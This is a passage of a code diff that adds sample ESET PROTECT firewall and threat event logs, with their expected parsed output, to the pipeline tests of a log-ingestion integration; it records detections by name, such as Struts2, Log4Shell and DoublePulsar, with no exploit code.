+{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 10:47:28","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":59840,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":80,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"CVE-2017-5638.Struts2","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 10:36:47","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":57313,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":8090,"protocol":"TCP","account":"NT AUTHORITY\\LOCAL SERVICE","process_name":"C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe","inbound":true,"threat_name":"HTTP/Exploit.CVE-2021-41773","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 10:31:03","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":56800,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":47001,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"CVE-2017-5638.Struts2","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 10:20:29","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":55682,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":3128,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Program Files\\Apache HTTP Proxy\\bin\\httpd.exe","inbound":true,"threat_name":"HTTP/Exploit.CVE-2021-41773","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 10:08:15","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":51937,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":445,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"SMB.CVE-2011-1267","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine4","source_uuid":"c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e","occured":"14-Mar-2024 10:00:42","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":64616,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":47001,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"CVE-2017-5638.Struts2","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 09:52:36","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":59912,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":445,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"SMB.CVE-2011-1267","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 09:11:13","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","target_address":"1.128.0.5","target_address_type":"IPv4","target_port":8090,"protocol":"TCP","account":"NT AUTHORITY\\LOCAL SERVICE","process_name":"C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe","inbound":true,"threat_name":"JAVA/Exploit.CVE-2021-44228","aggregate_count":4} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 09:34:21","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":50505,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":445,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"SMB/Exploit.DoublePulsar.B","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 09:15:30","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","target_address":"1.128.0.5","target_address_type":"IPv4","target_port":8813,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"D:\\sw\\Environmental Manager\\EnvironmentalManagerService.exe","inbound":true,"threat_name":"JAVA/Exploit.CVE-2021-44228","aggregate_count":2} +{"event_type":"FirewallAggregated_Event","ipv4":"1.128.0.5","hostname":"machine4","source_uuid":"c539dbdf-2063-477b-81d7-8081a6f7a080","occured":"12-Mar-2024 11:00:26","severity":"Fatal","event":"Web threat","source_address":"192.168.30.32","source_address_type":"IPv4","source_port":37966,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":49677,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Windows\\System32\\lsass.exe","inbound":true,"threat_name":"RPC/Exploit.CVE-2020-1472","aggregate_count":1} +{"event_type":"Threat_Event","ipv4":"192.168.30.31","hostname":"machine5","source_uuid":"f193d96b-cbd8-4402-94fc-6993efc30b11","occured":"11-Mar-2024 05:56:58","severity":"Warning","threat_type":"Trojan","threat_name":"LNK/Agent.BZ","scanner_id":"Real-time file system protection","scan_id":"virlog.dat","engine_version":"28873 (20240310)","object_type":"File","object_uri":"file:///E:/Removable Drive (1GB).lnk","action_taken":"Cleaned by deleting","threat_handled":true,"need_restart":false,"username":"machine5\\Administrator","processname":"C:\\Windows\\explorer.exe","circumstances":"Event occurred during an attempt to access the file.","firstseen":"28-Jul-2021 07:20:55","hash":"1A45EBA0F9EF909E6F3C87B0D5CEDAD27BDB6CF2"} +{"event_type":"Threat_Event","ipv4":"192.168.112.128","ipv6":"","hostname":"kate-ebademo","source_uuid":"16b429cb-c064-4a31-98ba-62fff54f0c96","os_name":"Microsoft Windows 11 Pro","occured":"27-Mar-2024 09:54:20","group_name":"All","group_description":"","severity":"Warning","threat_type":"Trojan","threat_name":"VBS\/TrojanDownloader.Agent.YUI","threat_flags":"","scanner_id":"Script scanner","scan_id":"virlog.dat","engine_version":"28962 (20240327)","object_type":"File","object_uri":"script","action_taken":"Blocked","action_error":"","threat_handled":"true","need_restart":"false","username":"KATE-EBADEMO\\Kate","processname":"PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.22621.1","circumstances":"","firstseen":"","hash":"22B9B35A804A7A3739CBD007E00959075AECF0FC"} diff --git a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json index a2df25a3dad..eeddfd561a1 100644 --- a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json +++ b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json @@ -46,6 +46,16 @@ "indicator" ] }, + "file": { + "directory": "/Users/Administrator/Downloads/xls/", + "drive_letter": "C", + "name": "YICT080714.xls", + "path": "C:/Users/Administrator/Downloads/xls/YICT080714.xls", + "type": "file", + "hash": { + "sha1": "5b97884a45c6c05f93b22c4059f3d9189e88e8b7" + } + }, "group": { "name": "All/Lost & found" }, @@ -55,6 +65,7 @@ "ip": [ "192.168.30.30" ], + "name": "030-mg", "os": { "name": "Microsoft Windows 11 Pro" } @@ -65,7 +76,7 @@ }, "related": { "hash": [ - "5B97884A45C6C05F93B22C4059F3D9189E88E8B7" + "5b97884a45c6c05f93b22c4059f3d9189e88e8b7" ], "hosts": [ "030-mg", @@ -86,7 +97,7 @@ "indicator": { "file": { "hash": { - "sha1": "5B97884A45C6C05F93B22C4059F3D9189E88E8B7" + "sha1": "5b97884a45c6c05f93b22c4059f3d9189e88e8b7" } }, "first_seen": "2021-06-21T09:46:14.000Z", @@ -155,6 +166,7 @@ "ip": [ "192.168.30.30" ], + "name": "w16test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -243,6 +255,7 @@ "ip": [ "192.168.30.181" ], + "name": "test-w10-uefi", "os": { "name": "Microsoft Windows 11 Pro" } @@ -312,6 +325,7 @@ "ip": [ "192.168.30.30" ], + "name": "030-mg", "os": { "name": "Microsoft Windows 11 Pro" } @@ -319,6 +333,7 @@ "message": "Authenticating native user 'Administrator'.", "related": { "hosts": [ + "030-mg", "030-MG", "72cdf05f-f9c8-49cc-863d-c6b3059a9e8e" ], @@ -401,6 +416,7 @@ "ip": [ "192.168.30.30" ], + "name": "win-test", "os": { "name": "Microsoft Windows 11 Pro" } @@ -412,7 +428,7 @@ }, "related": { "hash": [ - "ABCDAA625E6961037B8904E113FD0C232A7D0EDC" + "abcdaa625e6961037b8904e113fd0c232a7d0edc" ], "hosts": [ "win-test", @@ -482,11 +498,13 @@ "name": "All/Lost & found" }, "host": { - "hostname": "shdsolec.vddjc", + "domain": "vddjc", + "hostname": "shdsolec", "id": "csd77ad2-2453-42f4-80a4-d86dfa9d0543", "ip": [ "192.168.30.30" ], + "name": "shdsolec.vddjc", "os": { "name": "Microsoft Windows 11 Pro" } @@ -498,6 +516,7 @@ "related": { "hosts": [ "shdsolec.vddjc", + "shdsolec", "csd77ad2-2453-42f4-80a4-d86dfa9d0543" ], "ip": [ @@ -562,6 +581,7 @@ "ip": [ "175.16.199.1" ], + "name": "testingpc", "os": { "name": "Microsoft Windows 11 Pro" } @@ -633,6 +653,16 @@ "indicator" ] }, + "file": { + "directory": "/Users/Administrator/Downloads/", + "drive_letter": "C", + "name": "malicious.exe", + "path": "C:/Users/Administrator/Downloads/malicious.exe", + "type": "file", + "hash": { + "sha1": "8f765a7d2b0e4d11bc0e79313a8f8e0019f317d9" + } + }, "group": { "name": "All/Lost & found" }, @@ -642,6 +672,7 @@ "ip": [ "192.168.30.31" ], + "name": "031-mg", "os": { "name": "Microsoft Windows 10 Pro" } @@ -652,7 +683,7 @@ }, "related": { "hash": [ - "8F765A7D2B0E4D11BC0E79313A8F8E0019F317D9" + "8f765a7d2b0e4d11bc0e79313a8f8e0019f317d9" ], "hosts": [ "031-mg", @@ -673,7 +704,7 @@ "indicator": { "file": { "hash": { - "sha1": "8F765A7D2B0E4D11BC0E79313A8F8E0019F317D9" + "sha1": "8f765a7d2b0e4d11bc0e79313a8f8e0019f317d9" } }, "first_seen": "2021-06-21T09:47:29.000Z", @@ -742,6 +773,7 @@ "ip": [ "192.168.30.31" ], + "name": "firewall-test", "os": { "name": "Microsoft Windows 10 Pro" } @@ -845,6 +877,7 @@ "ip": [ "192.168.30.31" ], + "name": "firewall-test", "os": { "name": "Microsoft Windows 10 Pro" } @@ -896,6 +929,1349 @@ "sightings": 5 } } + }, + { + "@timestamp": "2024-03-15T18:49:08.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine1.domain.com", + "inbound": true, + "ipv4": "1.128.0.5", + "is_handled": false, + "name": "Suspected botnet detected", + "occured": "2024-03-15T18:49:08.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Fatal", + "source_address": "192.168.101.2", + "source_address_type": "IPv4", + "source_port": 53884, + "source_uuid": "ca28cf94-2696-44e6-bb0a-1325b09c562f", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 443, + "threat_name": "EK-Mozi", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"1.128.0.5\",\"hostname\":\"machine1.domain.com\",\"source_uuid\":\"ca28cf94-2696-44e6-bb0a-1325b09c562f\",\"occured\":\"15-Mar-2024 18:49:08\",\"severity\":\"Fatal\",\"event\":\"Suspected botnet detected\",\"source_address\":\"192.168.101.2\",\"source_address_type\":\"IPv4\",\"source_port\":53884,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":443,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"EK-Mozi\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine1", + "id": "ca28cf94-2696-44e6-bb0a-1325b09c562f", + "ip": [ + "1.128.0.5" + ], + "name": "machine1.domain.com" + }, + "message": "Suspected botnet detected", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine1.domain.com", + "machine1", + "ca28cf94-2696-44e6-bb0a-1325b09c562f" + ], + "ip": [ + "1.128.0.5", + "192.168.101.2" + ] + }, + "source": { + "ip": "192.168.101.2", + "port": 53884 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "EK-Mozi", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:47:28.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:47:28.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 59840, + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 80, + "threat_name": "CVE-2017-5638.Struts2", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 10:47:28\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":59840,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":80,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"CVE-2017-5638.Struts2\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 59840 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "CVE-2017-5638.Struts2", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:36:47.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 8090 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\LOCAL SERVICE", + "aggregate_count": 1, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:36:47.000Z", + "processname": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 57313, + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 8090, + "threat_name": "HTTP/Exploit.CVE-2021-41773", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 10:36:47\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":57313,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":8090,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\LOCAL SERVICE\",\"process_name\":\"C:\\\\Program Files (x86)\\\\Schneider Electric\\\\Floating License Manager\\\\FLEXnet Publisher License Server Manager\\\\lmadmin.exe\",\"inbound\":true,\"threat_name\":\"HTTP/Exploit.CVE-2021-41773\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe", + "name": "lmadmin.exe" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\LOCAL SERVICE" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 57313 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "HTTP/Exploit.CVE-2021-41773", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:31:03.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 47001 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:31:03.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 56800, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 47001, + "threat_name": "CVE-2017-5638.Struts2", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 10:31:03\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":56800,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":47001,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"CVE-2017-5638.Struts2\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 56800 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "CVE-2017-5638.Struts2", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:20:29.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 3128 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "account": "NT AUTHORITY\\SYSTEM", + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:20:29.000Z", + "processname": "C:\\Program Files\\Apache HTTP Proxy\\bin\\httpd.exe", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 55682, + "source_uuid": "8452d051-47ba-4203-97f5-258899a4161b", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 3128, + "threat_name": "HTTP/Exploit.CVE-2021-41773", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine3.domain.com\",\"source_uuid\":\"8452d051-47ba-4203-97f5-258899a4161b\",\"occured\":\"14-Mar-2024 10:20:29\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":55682,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":3128,\"protocol\":\"TCP\",\"account\":\"NT AUTHORITY\\\\SYSTEM\",\"process_name\":\"C:\\\\Program Files\\\\Apache HTTP Proxy\\\\bin\\\\httpd.exe\",\"inbound\":true,\"threat_name\":\"HTTP/Exploit.CVE-2021-41773\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine3", + "id": "8452d051-47ba-4203-97f5-258899a4161b", + "ip": [ + "192.168.30.31" + ], + "name": "machine3.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "C:\\Program Files\\Apache HTTP Proxy\\bin\\httpd.exe", + "name": "httpd.exe" + }, + "related": { + "hosts": [ + "machine3.domain.com", + "machine3", + "8452d051-47ba-4203-97f5-258899a4161b" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 55682 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "HTTP/Exploit.CVE-2021-41773", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:08:15.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine2.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:08:15.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 51937, + "source_uuid": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 445, + "threat_name": "SMB.CVE-2011-1267", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine2.domain.com\",\"source_uuid\":\"ff802ef4-bfd6-4fe7-bbfb-215b6beed399\",\"occured\":\"14-Mar-2024 10:08:15\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":51937,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":445,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"SMB.CVE-2011-1267\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "domain": "domain.com", + "hostname": "machine2", + "id": "ff802ef4-bfd6-4fe7-bbfb-215b6beed399", + "ip": [ + "192.168.30.31" + ], + "name": "machine2.domain.com" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine2.domain.com", + "machine2", + "ff802ef4-bfd6-4fe7-bbfb-215b6beed399" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 51937 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "SMB.CVE-2011-1267", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T10:00:42.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 47001 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine4", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T10:00:42.000Z", + "processname": "System", + "protocol": "TCP", + "severity": "Warning", + "source_address": "192.168.9.254", + "source_address_type": "IPv4", + "source_port": 64616, + "source_uuid": "c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e", + "target_address": "1.128.0.5", + "target_address_type": "IPv4", + "target_port": 47001, + "threat_name": "CVE-2017-5638.Struts2", + "type": "FirewallAggregated_Event" + } + }, + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "original": "{\"event_type\":\"FirewallAggregated_Event\",\"ipv4\":\"192.168.30.31\",\"hostname\":\"machine4\",\"source_uuid\":\"c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e\",\"occured\":\"14-Mar-2024 10:00:42\",\"severity\":\"Warning\",\"event\":\"Security vulnerability exploitation attempt\",\"source_address\":\"192.168.9.254\",\"source_address_type\":\"IPv4\",\"source_port\":64616,\"target_address\":\"1.128.0.5\",\"target_address_type\":\"IPv4\",\"target_port\":47001,\"protocol\":\"TCP\",\"process_name\":\"System\",\"inbound\":true,\"threat_name\":\"CVE-2017-5638.Struts2\",\"aggregate_count\":1}", + "type": [ + "info" + ] + }, + "host": { + "hostname": "machine4", + "id": "c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e", + "ip": [ + "192.168.30.31" + ], + "name": "machine4" + }, + "message": "Security vulnerability exploitation attempt", + "network": { + "direction": "inbound", + "protocol": "tcp" + }, + "process": { + "executable": "System", + "name": "System" + }, + "related": { + "hosts": [ + "machine4", + "c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e" + ], + "ip": [ + "192.168.30.31", + "192.168.9.254", + "1.128.0.5" + ] + }, + "source": { + "ip": "192.168.9.254", + "port": 64616 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "name": "CVE-2017-5638.Struts2", + "provider": "ESET PROTECT", + "sightings": 1 + } + } + }, + { + "@timestamp": "2024-03-14T09:52:36.000Z", + "destination": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.5", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "event": { + "aggregate_count": 1, + "hostname": "machine3.domain.com", + "inbound": true, + "ipv4": "192.168.30.31", + "is_handled": false, + "name": "Security vulnerability exploitation attempt", + "occured": "2024-03-14T09:52:36.000Z", + "processname": "System", + "protocol": "TCP", + "severity": 